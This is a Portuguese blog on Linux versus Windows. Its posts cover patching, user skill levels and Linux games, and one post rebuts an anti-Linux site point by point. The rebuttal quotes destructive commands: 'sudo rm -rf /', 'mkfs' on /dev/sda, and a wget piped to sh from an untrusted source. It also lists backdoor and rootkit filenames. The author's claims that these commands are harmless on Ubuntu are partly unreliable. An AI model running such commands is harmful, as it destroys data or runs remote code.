Esta conclusão foi obtida a partir do software PSI da própria Secunia. Este software relaciona qual dos softwares instalados precisam ser atualizados. É importante ressaltar que o PSI apenas examina e reporta falhas, mas não as corrige.

Sendo gratuito, o PSI pode ser baixado daqui.

Dos usuários do PSI, metade tiveram 66 ou mais programas de 22 ou mais empresas diferentes e suas máquinas. Em 2009, concluiu-se que um usuário comum teve que lidar com quase 300 vulnerabilidades, e considerando a quantidade de fornecedores de software representados em suas máquinas, foi preciso lidar com 75 correções de software ao longo do ano.

Para complicar, algumas correções causam erros. Em janeiro de 2010, uma atualização do Windows 7 causou diversos outro pequenos problemas, e como congelamentos esporádicos de telas, e até mesmo congelamento durante a inicialização do SO.

De forma irônica, em 25/02/2010 o site The Inquirer comenta que o Windows 7 já recebeu mais bandagens que uma múmia egípcia, num artigo assinado por Spencer Dalziel.

De forma comparativa, o sistema operacional Linux, em suas mais conhecidas versões (Fedora, Ubuntu, etc) conseguiu simplificar tremendamente o processo de atualização de software, se forem considerados os softwares que são instalados através de seus repositórios próprios.

segunda-feira, 1 de março de 2010

Tipos de usuário

O G1 publicou uma reportagem muito interessante sobre Linux. Considerando a natureza generalista do G1, ou seja, ele não é dedicado a uma única área (só esportes, só cultura, etc), achei o conteúdo do texto muito bom, apesar da chuva de ataques dos comentários.

De forma geral, o artigo está excelente para leigos, faltando uma pequena melhora no que se relaciona a compatibilidade com hardwares, pois o texto deixa uma impressão que é o SO que deve se preocupar em ser compatível com o dispositivo. Deveria ser dito que existem listas de compatibilidade específicas de uma distro como a HCL para Ubuntu, ou HCL de RH ou listas genéricas para linux independente da distribuição.

Outra coisa que poderia ser melhorado é que usuário final apenas USA e não realiza procedimentos técnicos. Este usuário LEIGO tem sua profissão/negócio, e não quer fazer nada com o computador que seja diferente de usá-lo. Para ele, o computador é apenas uma ferramenta, como um torno ou uma máquina de fotocópia. Ele se preocupa mais em aproveitar o conjunto (hardware + software) para o que lhe interessa, do que qualquer outra coisa.

Quando o usuário sabe desfragmentar, sabe olhar a estrutura de diretórios e identificar a função de alguns diretórios especiais (Arquivos de Programas, Documents and Settings, etc), sabe esvaziar o cache de um browser, acredito que este usuário pode ser considerado como AVANÇADO. O usuário AVANÇADO lê um pouco mais sobre o funcionamento do seu sistema, procura por dicas na instalação de softwares, sabe um pouco sobre manutenção simples do SO. Mesmo assim, ele não realiza procedimentos mais complicados, que exigem algum conhecimento teórico. Alguns usuários AVANÇADOS não passam daí. E quando passam, estão no caminho de se tornarem TÉCNICOS.
Neste ponto em diante, uma grande catástrofe está por acontecer. Aqui, pessoas de todas as áreas compartilham de um senso comum: se auto-proclamam TÉCNICOS DE INFORMÁTICA. As suas mães fala deles com orgulho: "Meu filhos sabe mexer com computador", já que nossas mães em geral não sabem explicar nossas profissões para seus conhecidos ...

Quase todos não sabem o mínimo necessário, e se chamam profissionais. Este momento é o purgatório da informática, com cegos andando de um lado para o outro, esbarrando entre si, e querendo sair daquele tormento à custa do desprezo e difamação dos outros. Sim, um TÉCNICO DE INFORMÁTICA fala mal do outro, para crescer. Um crescimento falso, podre e viciante.

"D. Espafregunda, seu computador está uma miséria por causa do técnico que esteve aqui antes. Mas EU vou dar um jeito nisto".

Estes são verdadeiros zumbis, mortos-vivos, vampiros que vivem dos outros. Alguns vão permanecer neste tormento para todo o sempre, enquanto outros vão adquirir mais conhecimento, vão procurar certificações, faculdades, pós-graduação, e como um pokemon (argh!!), vão evoluir.

Daqui em diante, serão profissionais de diferentes níveis em diversas áreas. Deixarão guardados na memória com muito prazer, os dias de Noobies, lembrarão do pré-parto de Script Kiddies (os que os foram) e gozarão das benesses de um profissional autêntico.

Profissional autêntico? Onde está o Conselho da Classe ??? Mas isto é tema para outras elocubrações ...

Por isso, usuário leigo não instala programa nenhum nem no Linux, nem no Windows, nem em SO nenhum. Este engano é o mesmo que associa hackers a criminosos.


Fora isto, a matéria está quase perfeita.

quarta-feira, 24 de fevereiro de 2010

Quem disse que linux não é divertido ?

No post anterior, recebi um email que apontava para uma página que descrevia motivos para não usar Linux. A minha indignação com este texto foi bastante grande, mas não o suficiente para escrever qualquer coisa tentando mostrar que a maior parte do que foi escrito está fundamentado em argumentos vazios. Mas depois que eu li que o texto tinha sido recentemente atualizado, aí achei o fim da picada e escrevi em resposta, com o máximo de detalhes que eu encontrei.

Infelizmente, não recebi do autor nenhuma resposta sequer. Que fique bem claro, não sou contra o Windows, ou a Microsoft. Assim como muitos relacionam características que lhe são desagradáveis no Linux, assim também eu tenho algumas discordâncias no que diz respeito ao Windows. Mas nenhum dos dois é solução para tudo.

Acabo de vir de uma reunião excelente, com pessoas que não conhecia, onde debatemos acerca de assuntos comuns aos presentes, e entre eles, passamos pelos jogos para Linux.

Infelizmente, esta é uma outra área sofrida para Linux e outros SOs livres, aonde quase sempre se fala do que não se conhece. Recebi uma dica boa, mostrando uma lista de jogos FPS 3D para Linux, com alguns screenshots. Para os que gostam do "atira em tudo que se mexe", está é uma lista valiosa.

De todos estes, o que mais me diverte é o World Of Padman, muito bonito, rápido e bem humorado.

domingo, 21 de fevereiro de 2010

Será que eu voltei ?

Este texto é uma resposta a http://www.fanboysdelinux.hpg.com.br/

Vamos tentar digerir tudo, mas não antes de tomar um bom gole de Aloe Vera para facilitar o processo digestivo. Para simplificar, vou me referir ao site como FANBOYS.

  • FANBOYS - Você não acha estranho um sistema "tão bom" como é o linux segundo seus usuários xiitas, deter apenas 1% do mercado? Sim, isso mesmo, somente 1% dos computadores rodam Linux.
  • => De onde saiu este percentual exato? Qual foi a pesquisa que examinou TODOS os usuários domésticos do planeta ?

  • FANBOYS - Alegam que agora há synaptic, apt-get, entre outras ferramentas que facilitam a instalação. Isto não é totalmente verdadeiro, já que muitos outros programas não podem ser instalados através deles, além de drivers.
  • => As ferramentas synaptic (GUI), YAST (GUI e CLI), apt-get (CLI), aptitude (CLI), yum (CLI) são usadas para administração de softwares disponíveis nos repositórios. No caso dos drivers, quando o fabricante do hardware em questão se compromete em produzi-lo, ele está disponível. É o caso da HP, Xerox, Lexmark, ATI, NVIDIA. As máquinas de fotografia digital mais populares do mercado (SONY, Canon, Kodak, Yashica, etc) trabalham de forma padronizada, o que permite que QUALQUER Sistema Operacional que use USB possa acessar os seus arquivos (fotos) sem necessidade de software adicional. O mesmo acontece com celulares que armazeam mídia. Meus exemplos são Sony DSC T50 e o NOKIA XpressMusic

  • FANBOYS - Uma hora ou outra, você terá que recorrer ao terminal, a famosa janela preta. O Windows tem também, mas o terminal do Windows não é necessário para usuários domésticos convencionais, como provavelmente você que está com dúvidas se usa o Linux que veio no seu computador novo. O terminal do Windows é somente utilizado por experts que desejam configurar a gosto.
  • => Acredito que o que o autor chama de "usuários domésticos convencionais" são as pessoas que apenas usam o que está instalado. Estes usuários não sabem instalar absolutamente nada, sequer no Windows. Não conheço nenhum software destinado a "usuários domésticos convencionais" no Linux que precise sequer ser instalado, pelo menos no Ubuntu, pois a Canonical realiza um trabalho intenso para identificar quais softwares são mais utilizados por usuários de GUI, e os disponibiliza junto com o SO.
Assim sendo, ao encerrar a instalação do SO, já é possível editar um arquivo com formatação, visualizar arquivos de slides, editar fotografias, acessar internet, usar IMs, acessar a GUI de uma quantidade não limitada por licença de hosts na rede, usar software de torrents, gravar arquivos em sistema gratuito de Cloud Computing, usar um software de desenho vetorial, usar um organizador de mídias, usar um gravador simples de voz, entre outros softwares disponíveis na instalação.
Claro, todo este software está disponível para Windows, os mesmos ou equivalentes ou superiores. Mas obrigatoriamente terão que ser instalados DEPOIS da conclusão do Windows, e um de cada vez. Dependendo dos softwares necessários e do hardware, instalar o Windows, configura-lo e em seguida instalar os seus softwares pode levar mais de uma hora.
Pensando em usuário final, uma linha de comando é sempre menos indicada, mas por vezes inevitável. Vamos supor um suporte por telefone, que precise saber se o host do usuário em questão está na mesma rede de um outro host. Como este suporte faria para desenvolver esta tarefa em um Windows ou Linux recém instalados? Naturalmente, teria que pedir para o usuário final "pingar" o host destino. Em ambos os casos, o usuário final teria que digitar "ping x.y.z.w"

  • FANBOYS - Além disso, o terminal do Windows é muito mais intuitivo do que o do Linux (só pelo nome dos comandos dá para ter idéia do que fazem)
  • => quão intuitivo é digitar um comando xcopy, ftp, telnet, mode, title, sys, more, label, for ? linha de comando não é nem nunca será para qualquer usuário final. Apenas para profissionais. Assim, esta afirmação de intuitividade é muito relativa ... Mas apenas para lembrar, a tal "linha de comando" ou "janela preta" vem do início da década de 70, ou seja, antes da MS existir. Isso mostra que a experiência de "usabilidade" provavelmente vai pesar mais para o lado do Unix e descendentes.

  • FANBOYS - Há casos graves de falhas do Linux, como as de quem tem monitor LCD, se o sistema não reconhecer a placa de vídeo, o monitor entra "fora de escala" ou "fora de sincronia" (e não adianta usar o comando pra forçar resolução ou frequência). O único jeito de bootar então seria mexendo nos arquivos x.org config, o que exige conhecimento.
  • => Uma afirmação destas parece vir de um técnico novato. Em qualquer SO existe esta possibilidade, de um hardware qualquer não ser reconhecido. Tente instalar EM QUALQUER WINDOWS um hardware que precise de um driver, sem ter o driver. Se conseguir, aceito o fato que o Linux é um horror cheio de falhas graves.
E mesmo assim, se for possível corrigir isto sem ter que instalar o drive, ainda é melhor que não poder usar caso a única saída seja instalar um drive que vc não tem. Imagine se isto acontece com o Windows, e vc não tem acesso à internet para procurar o tal driver ???

  • FANBOYS - “Talvez eu devesse comprar uma cópia do Windows 7, ouvi dizer que ele… funciona. Como podemos esperar que usuários leigos usem essa montanha de lixo que é o Linux?”
  • => Wyatt disse isto, deixou o projeto, mas interessantemente, foi só ele que fez isso, pois os outros continuaram. Mas até mesmo aí eu olho pra trás e vejo o Vista, o NT4, o ME, o fiasco da primeira versão do 95, fora as falhas transmitidas pela tv do Windows 98 e do reconhecimento de voz.

  • FANBOYS - Fazendo uma consulta rápida ao softpedia.com, superdownloads, etc, você poderá ver que o Windows possui milhares de vezes mais softwares que Linux. Isso em um site de downloads! Imagine os outros milhares de softwares que o Windows tem. Além disso, a maioria dos softwares decentes de Linux gratuitos, tem versão igualmente gratuita para Windows, como Open Office, GIMP, etc.
  • => Eu questiono a opinião de quem busca softwares em sites como o superdownloads... Mas vá lá que seja. Considerando o tempo do Windows para Desktop, eu iria me surpreender se a maioria dos softwares desenvolvidos para Desktop não fosse para Windows. Mas a minha dúvida é: O QUE É QUE TEM A VER UM SOFTWARE SER DESENVOLVIDO PARA MAIS DE UMA PLATAFORMA ? A adobe desenvolve para Windows e para Mac. QUAL O PROBLEMA NISTO? Não é o "Linux" que faz os softwares, são desenvolvedores independentes ou empresas. QUAL O PROBLEMA NISTO???
  • FANBOYS - No Linux, se você quiser jogar, terá que usar o Wine. Além de ficar uma verdadeira gambiarra, a performace será comprometida e você precisará de conhecimentos bons para resolver problemas (como os de jogos on-line multiplayer e joysticks, volantes, etc) e colocar para funcionar direito. Ou seja, leigo? Tchau.
  • => Existem jogos disponíveis para Linux sim. Não tantos como existem para Windows, uma vez que os desenvolvedores fazem softwares EXCLUSIVAMENTE para Windows. Não há tantos jogos para Mac tb. Mas não preciso de Wine para jogar qualquer jogo. World of Padman é um exemplo excelente de jogo desenvolvido para as duas plataformas. Quake e Doom também, e sem emulador. Caso queira ver outras opções, visite www.tuxgames.com. Alguns lá precisam de Wine, outros rodam nativamente. Mas eu gostaria muito que os autores de Need for Speed escrevessem uma versão nativa para Linux. Mas, eles sabem dos motivos para não fazer isso, seja lá quais forem.

  • FANBOYS - A frase está no tempo errado: Windows pegava muitos vírus. Hoje, com o Windows Vista e Windows Seven, contaminar-se por motivos bobos como ocorriam antigamente, por exemplo, ao entrar em um site, plugar um pendrive ou pela rede, não ocorre mais. Pegar vírus sem intervenção do usuário era realmente válido, mas para Windows como o 98, que você entrava com o I.E em um site e o vírus já entrava automaticamente.
=> Esta foi no mínimo simples ... Fui no site da McAfee e achei o seguinte (em 21/2/2010) :
  • February 9, 2010: Microsoft has released their February 2010 Security Bulletins. A total of 13 bulletins have been released. Affected components include Microsoft Windows and Microsoft Office. Five of the bulletins are rated 'Critical' while an additional six are rated 'Important'. Eight of the bulletins carry a potential impact of remote code execution.
  • McAfee Labs identified a zero-day vulnerability in Microsoft Internet Explorer that was used as an entry point for “Operation Aurora” to exploit Google and a rapidly-growing list of other companies. Microsoft has issued a security bulletin and McAfee is working closely with them on this matter. “Operation Aurora” was a coordinated attack which included a piece of computer code that exploits a vulnerability in Internet Explorer to gain access to computer systems. This exploit is then extended to download and activate malware within the systems. The attack, which was initiated surreptitiously when targeted users accessed a malicious Web page (likely because they believed it to be reputable), ultimately connected those computer systems to a remote server. That connection was used to steal company intellectual property and, according to Google, additionally gain access to user accounts
  • Searching for the latest Winter Olympic news and downloads can cause serious damage to one’s computer. Cybercriminals are using Olympians’ names and images to lure surfers searching for the latest stories, screen savers and wallpapers to sites offering free downloads laden with viruses and malware.

O Site USN do Ubuntu mostra TODAS as falhas registradas, e nesta página, a primeira vulnerabilidade ocorre em 22-10-2004 e segue até 18-02-2010, em um total de 1037 ocorrências, o que gera uma média de 16 vulnerabilidades por mês (65 meses).

Pelo informe da McAfee, entrar num site com Internet Explorer também dá problema, e dos pesados. Mas para não ser tão parcial, fui em Security Focus, uma das referências no quesito vulnerabilidades (http://www.securityfocus.com/bid), e fiz as seguintes buscas:
- Com VENDOR=UBUNTU, TITLE=UBUNTU AMD and INTELx86-64: Nenhuma Vulnerabilidade
- Com VENDOR=UBUNTU, TITLE=UBUNTU LINUX: 46 Páginas de títulos de Vulnerabilidades
- Com VENDOR=MICROSOFT, TITLE=WINDOWS 7: Apenas 1 página
- Com VENDOR=MICROSOFT, TITLE=WINDOWS VISTA: Apenas 6 páginas
- Com VENDOR=MICROSOFT, TITLE=WINDOWS VISTA x64 EDITION: Apenas 5 páginas

Neste último caso, são listadas 140 vulnerabilidades, entre 28-08-2007 e 18-02-2010, ou seja, apenas 4,5 Vulnerabilidades por mês (31 meses). Assim, seguindo este ritmo, teríamos 2925 vulnerabilidades no mesmo período de 65 meses. Claro, isto é uma proporção no mínimo "irresponsável" de minha parte, considerando a melhoria de segurança que se viu no Windows, desde o XP PROFESSIONAL. Aliás, a procura no site acima com VENDOR=MICROSOFT, TITLE=WINDOWS XP PROFESSIONAL aponta "apenas" 17 páginas.

Considerando TODAS as 12 versões do Ubuntu (4.10, 5.04, 5.10, 6.04, 6.10, 7.04, 7.10, 8.04, 8.10, 9.04, 9.10, 10.04), percebo que é muito pouco perto das muitas versões do Windows (mais de 20, sem contar com os Service Packs), fazendo uma comparação igual, ou seja, desde as mais antigas versões do Windows, tipo Windows 3.11.

Um outro detalhe é que FANBOYS apenas relacionaram as falhas de Ubuntu. Note que o tempo de solução individual é razoavelmente pequeno, sendo em geral de poucas horas, desde o anúncio oficial das falhas até a publicação da mesma. A MS, porém, detém um recorde fantástico, que acho (realmente não tenho certeza) deve ser o maior tempo levado para solucionar uma vulnerabilidade: 17 anos ... pode ser visto em http://tech.slashdot.org/story/10/02/06/0158248/Microsoft-Finally-To-Patch-17-Year-Old-Bug?from=rss

  • FANBOYS - É mais uma mentira! Há sim vírus para linux, só que em menor quantidade, por dois motivos: O primeiro é que só possui 1% do mercado, e essas pessoas que usam, são pessoas com maior conhecimento (geeks, etc) e não cairiam em métodos comumente utilizados para infecção como engenharia social.
  • => O problema dos 1%, já foi comentado. Pelo texto acima, o Linux parece ser preferido pelas "pessoas com maior conhecimento". Me sinto lisonjeado. Nem quero imaginar qual o termo usado para usuários de Windows.

  • FANBOYS - http://packetstorm.codar.com.br
  • => O que foi encontrado na primeira página do PacketStorm, diga-se de passagem uma excelente referência, foi o seguinte:
evilbs.tar.gz - bindshell
connect-back.php.txt - script php
istari-public.tar.gz - python script
enyelkm-1.3-no-objs.tar.gz - rootkit
solaris-sshd.tar.gz - rootkit
funnyscript.c - código fonte
evilshell.c - backdoor
c99.tgz - php script
ezmal-0.2.zip - Trojan
3vilSh3ll.c - bindshell
m_rev-0.2.c - utility
rathole-1.2.tar.gz - backdoor
rcbd.c - backdoor
erne.txt - shell script
rel.tar.gz - rootkit
backdoor.tar.gz - rootkit
openssh-4.6p1-backdored.tar.gz - backdoor
openssh-4.5p1_backdoored.tar.gz - backdoor
mood-nt.tgz - rootkit
logginsh.txt - shell script
pingrootkit.tar.bz2 - rootkit
m0rtix.c - backdoor
wnetstat.pl - perl script
ssheater-1.1.tar.gz - código fonte

Aparentemente FANBOYS não sabe exatamente o que é vírus e o que é malware. Na Wikipedia a definição é "A computer virus is a computer program that can copy itself and infect a computer. The term "virus" is also commonly but erroneously used to refer to other types of malware, adware, and spyware programs that do not have the reproductive ability. [...] The term "computer virus" is sometimes used as a catch-all phrase to include all types of malware, adware, and spyware programs that do not have the reproductive ability. Malware includes computer viruses, worms, trojans, most rootkits, spyware, dishonest adware, crimeware, and other malicious and unwanted software, including true viruses.".

Nenhum dos itens relacionados acima são qualificados pelo próprio site como vírus. Se pelo menos o FANBOYS tivesse usado o termo correto não teria sido preciso procurar tanto. Mesmo assim fui procurar diversos textos que faziam a comparação Linux x Windows em termos de segurança, e achei esta afirmação (http://dotgiri.com/2009/02/10/reason-linux-less-virus-gaming-music-player/):
"To be very precise about this point;I should say that Linux is multi user operating system by birth itself, whereas Windows got transformed to a multi user OS from its original Single user model. Many of those Single user design is still used in modern version of windows. So if a virus infect a Linux system it is limited to that particular user alone where as in windows access to system files and access to every users is pretty easy. Hence the consequences of virus attach can be much more."

FANBOYS parece realmente não saber diferenciar tipos distintos de malware, como pode ser visto em http://under-linux.org/f138/peguei-virus-no-linux-135480/. A impressão é que o objetivo de FANBOYS ter posto este link no Under Linux foi tentar alardear que Linux também tem vírus, sem no entanto saber exatamente o que é vírus.

  • FANBOYS - Ora, e desde quando liberdade está associada só ao fato de ser gratuito?
  • => Este é o tipo de afirmação que um usuário Linux dificilmente faria, hoje em dia. Se falar um mínimo de inglês, vai saber que FREE tem as duas traduções (livre e gratuito). Costuma-se dizer "free as free speech, not free beer". Ou seja liberdade não está associado ao fato de ser gratuito. Não sei (nem foi dito) de onde saiu esta afirmação.

  • FANBOYS - No Windows nós pagamos pela comodidade de um sistema mais fácil de usar, comprometido com atualizações e que mantém um suporte para os clientes.
  • => Já falamos aqui do caso raro da MS levando 17 anos para corrigir uma vulnerabilidade.

  • FANBOYS - Estranho, pois o maior fórum de informática do Brasil é o Baboo, e é sobre Windows
  • => Gostaria de saber que pesquisa foi esta que apontou o BABOO como tal. Não me recordo de algo assim. Caso exista, eu não soube e gostaria de acessar o conteúdo desta pesquisa.

Deste ponto em diante, o texto fica tedioso e apelativo, por isso vou tentar filtrar os itens mais importantes.

  • FANBOYS - Linux - R$0,00 (mas você terá dores de cabeça, e ninguém será obrigado a lançar atualizações pra ele, já que é de graça); Windows Vista Starter (Diferentemente do XP starter, o Vista Starter é usável e decente) - Acréscimo de R$20 a 60,00 em média; Windows Seven Home Premium: Acréscimo de R$100,00 a R$150,00.; Você realmente acha caro R$120,00 por um sistema que irá facilitar a sua vida, proporcionar diversão, instalação de jogos, programas, etc e que durará no mínimo 4 anos, tendo updates mensalmente e tudo mais? É quase de graça!
  • => Infelizmente, ao acabar de instalar o Windows comprado, vai estar faltando instalar os softwares necessários: Office, jogos, software de desenho e outros. Interessantemente FANBOYS esqueceu de incluir este detalhe irrisório no cálculo de preços. Além disso, eu quase não entendi o porquê do termo "dor de cabeça", mas depois lembrei que o Linux parece ser preferido pelas "pessoas com maior conhecimento", como foi dito acima. Seguindo o pensamento do FANBOYS, quem vai ter problemas é o usuário do Windows, já que os usuários do Linux são "pessoas com maior conhecimento". Aliás, FANBOYS parece desconhecer que distribuições como Slackware e DEBIAN estão a bastante tempo no mercado , e continuam fornecendo atualização, mesmo sendo "de graça".

  • FANBOYS - Você conhece, algum produto em que a empresa que o vendeu ainda tenha gastos com o cliente após anos e anos de ter sido vendido além do Windows? Não existe!
  • => Para citar alguns, RedHat e Ubuntu. Aliás, a versão 10.04 do Ubuntu será lançada em modalidade LTS.

  • FANBOYS - Por que os usuários de Linux atacam tanto a Microsoft?
  • => Isso não é verdade. Normalmente, nosso ataque tem sido defesa. Pelo menos é o meu caso, como neste próprio texto.

  • FANBOYS - Linux é para quem entende de informática, e Windows para leigo?
  • => Pelo que o FANBOYS disse anteriormente, é. Foi FANBOYS quem disse, não eu: os usuários do Linux são "pessoas com maior conhecimento".

  • FANBOYS - Por que eles escolheram Linux?
  • => Até este ponto, o texto estava tão bom quanto qualquer defesa mal elaborada. Daqui em diante, o autor propõe suas respostas pessoais para perguntas que ele mesmo cria. Assim, vou rebater com minhas palavras também.

  • FANBOYS - "Argumentos como os de "posso fazer do meu jeito", "compilar", etc não servem para um uso doméstico."
  • -> Escolhi para aprender algo diferente, e passei a usar por me apresentar mais estabilidade e menos problemas de travamentos. Configurar um SO é, foi e sempre será uma tarefa não destinada a usuários domésticos. Pelo contrário, usuários domésticos nos pagam para fazer isso.

  • FANBOYS - Outra explicação é que alguns dos usuários Linux tem alguns problemas sociais (se você duvida, pesquise e verá que a maioria deles não possui vida social boa, e principalmente, tem dificuldades em arranjar um parceiro(a).
  • -> Não consigo achar a fonte desta "pesquisa" e muito menos base para esta afirmação sexual. Nem tenho idéia de onde ele tenha procurado esta informação. Para que conste nos autos, eu sou casado.

  • FANBOYS - Sim, Linux é comunista, como a grande maioria dos softwares open-source. O “Software Livre”, de acordo com os preceitos da Free Software Foundation (que criou o termo), é nada mais do que uma expressão do Marxismo, ou seja, capital intelectual obrigatoriamente aberto e distribuído à todos.
  • -> Este texto está ficando cada vez pior ... Linux começou com uma brincadeira de um estudante e se tornou um sistema operacional como outro qualquer. Aliás, Linux nem é sistema operacional, é apenas o kernel. Mas, e se fosse realmente comunista: É criminoso quem defende o comunismo ? Comunistas são pessoas não quistas? Só falta dizer que Linux é ferramenta do neo-nazismo...

  • FANBOYS - O fato de ser gratuito não significa que seja uma coisa boa. O Linux oferecer tudo gratuitamente chega a ser uma concorrência desleal, e caso o mesmo tivesse muito mercado, traria sérios problemas a quem precisa do seu pão-de-cada-dia, pois há tanto suporte gratuito que não há espaço para ganhar dinheiro.
  • -> Considerar o Linux como "concorrência desleal" me faz entender que mesmo para FANBOYS Linux não é tão insignificante assim, já chegando a ser concorrência. Bom, de qualquer jeito, eu vivo de Linux, seja em treinamentos, seja em consultorias, seja em empregos. E pela graça de Deus, já até mudei de estado por isso. Parafraseando o personagem do Tom Cavalcanti, "podia estar matando, roubando ou me prostituindo", mas preferi Linux. "Caso o mesmo tivesse muito mercado" indica que FANBOYS está aparentemente desatualizado. Profissionais MCSE, MCSA, LPIC, RHCE são igualmente muito requisitados e em geral bem remunerados, entretanto uma empresa de médio porte não precisa de 20 MCSEs ou LPICs. A maior quantidade de profissionais necessários serão os menos especializados. Uma engenharia precisa de menos operários do que engenheiros.

  • FANBOYS - Se isso fosse verdade, por que 90% dos usuários do Linux sempre tem alguma imagem do Pinguim tomando suco de Windows, batendo na borboleta do MSN, e coisas do tipo?
  • -> Tem mesmo estes wallpapers, mas ... de onde saíram estes 90% ??? ainda não vi esta pesquisa que foi a cada usuário final ver a imagem do Desktop.

  • FANBOYS - Comandos Letais do Linux
  • => Vou corrigir os erros cometidos por FANBOYS, caso estivesse sendo usado um Ubuntu:
  1. sudo rm -rf / (deltree c:\) : Sem sudo não pode ser executado
  2. sudo mkfs.ext3 /dev/sda (format c:) : não formata a partição caso esteja sendo usada (montada)
  3. qualquer_comando > /dev/sda : mesmo com sudo não funcionaria por causa das permissões de escrita. Seria preciso estar usando o sistema como root, o que normalmente não acontece
  4. sudo wget http://alguma_fonte_não_confiável -O- | sh : Sem sudo não pode ser executado
  5. char etc etc etc : não deu em nada, mesmo executado como root
  6. Sequência de chaves, dois pontos e outros caracteres: aqui deu mensagem de erro de sintaxe, mesmo executado como root. Copiei literalmente como estava no texto de FANBOYS.
Infelizmente, FANBOYS usa citações sem origem citada. Infelizmente, tudo quase passa a ser pessoal. Não citando autores das suas afirmações, ela podem ser compreendidas como opinião própria.
Quero crer que FANBOYS esqueceu de incluir estas citações, como é o caso das porcentagens, das frases, etc. As poucas citações mencionadas me fazem crer que foi mais um descuido no momento de compor o texto.
Entretanto, as afirmações de dificuldade de relacionamento, tendências políticas parecem ser extremamente discriminatórias, o que é no mínimo lamentável.
Infelizmente, em nosso país, é muito difícil manter uma discussão saudável sem que haja um tom de ironia, ou recursos de apelação grosseira.
Confesso, lancei mão da ironia em algumas vezes, baseado em afirmações muito mal elaboradas por FANBOYS.

Este texto foi escrito em toda uma madrugada, e ao final será enviado um email ao autor de FANBOYS.

Grande Abraço

Notícias Linux

Dicas-L: Dicas técnicas de Linux e Software Livre

Ubuntu Dicas

Security Fix

 
Creative Commons License
Blog Livre e Social by Gilberto Martins is licensed under a Creative Commons Atribuição 2.5 Brasil License.